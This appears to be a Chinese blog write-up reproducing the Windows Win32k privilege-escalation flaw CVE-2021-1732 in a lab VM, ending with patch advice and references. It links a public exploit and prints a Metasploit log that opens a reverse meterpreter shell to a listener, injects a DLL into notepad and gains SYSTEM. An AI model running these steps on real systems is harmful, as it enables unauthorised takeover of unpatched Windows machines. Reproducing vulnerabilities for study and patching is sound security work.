CVE-2021-1732:Windows Win32k提权

2021-04-01 09:49:51 浏览数 (1)

影响范围

Windows Server, version 20H2 (Server Core Installation) 

Windows 10 Version 20H2 for ARM64-based Systems 

Windows 10 Version 20H2 for 32-bit Systems 

Windows 10 Version 20H2 for x64-based Systems 

Windows Server, version 2004 (Server Core installation) 

Windows 10 Version 2004 for x64-based Systems 

Windows 10 Version 2004 for ARM64-based Systems 

Windows 10 Version 2004 for 32-bit Systems 

Windows Server, version 1909 (Server Core installation) 

Windows 10 Version 1909 for ARM64-based Systems 

Windows 10 Version 1909 for x64-based Systems 

Windows 10 Version 1909 for 32-bit Systems 

Windows Server 2019 (Server Core installation) 

Windows Server 2019 

Windows 10 Version 1809 for ARM64-based Systems 

Windows 10 Version 1809 for x64-based Systems 

Windows 10 Version 1809 for 32-bit Systems 

Windows 10 Version 1803 for ARM64-based Systems 

Windows 10 Version 1803 for x64-based Systems

漏洞类型

本地权限提升

利用条件

影响范围应用

漏洞概述

2021年2月10日,微软例行补丁包中修复了一个Windows系统本地提权漏洞,本地攻击者可以利用此漏洞提升到system权限,据称造成该漏洞的主要原因是Windows 图形驱动win32kfull!NtUserCreateWindowEx函数中的一处内核回调用户态分配内存与tagWND->flag属性设置不同步所致,使得可以通过伪造tagWND->offset值发生内存越界。

漏洞复现

环境搭建

前往"MSDN我告诉你"(https://msdn.itellyou.cn/)下载Windows 10 1909 x64位操作系统:

之后通过虚拟机安装Windows 10 1909系统镜像来搭建Windows 10漏洞复现环境,查看版本信息如下:

查看当前用户权限如下:

漏洞利用

下载漏洞EXP:

https://github.com/KaLendsi/CVE-2021-1732-Exploit

之后编译EXP:

在Windows 10上执行EXP后成功提权之system权限:

MSF框架

代码语言:javascript复制
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: DESKTOP-JKM0HADaliddle
meterpreter > sysinfo
Computer        : DESKTOP-JKM0HAD
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background 
[*] Backgrounding session 1...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/cve_2021_1732_win32k 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_1732_win32k) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/cve_2021_1732_win32k) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_1732_win32k) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(windows/local/cve_2021_1732_win32k) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[ ] The target appears to be vulnerable.
[*] Launching notepad to host the DLL...
[ ] Process 7672 launched.
[*] Reflectively injecting the DLL into 7672...
[*] Sending stage (200262 bytes) to 192.168.159.66
[ ] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.66:60838) at 2021-03-15 17:56:28 -0400
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter >

安全建议

官方已发布更新补丁包,在影响范围的系统可以打补丁进行修复:

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732

参考链接

https://github.com/rapid7/metasploit-framework/pull/14907

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1732

https://msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732

https://bbs.pediy.com/thread-266362.htm

安全漏洞

0 人点赞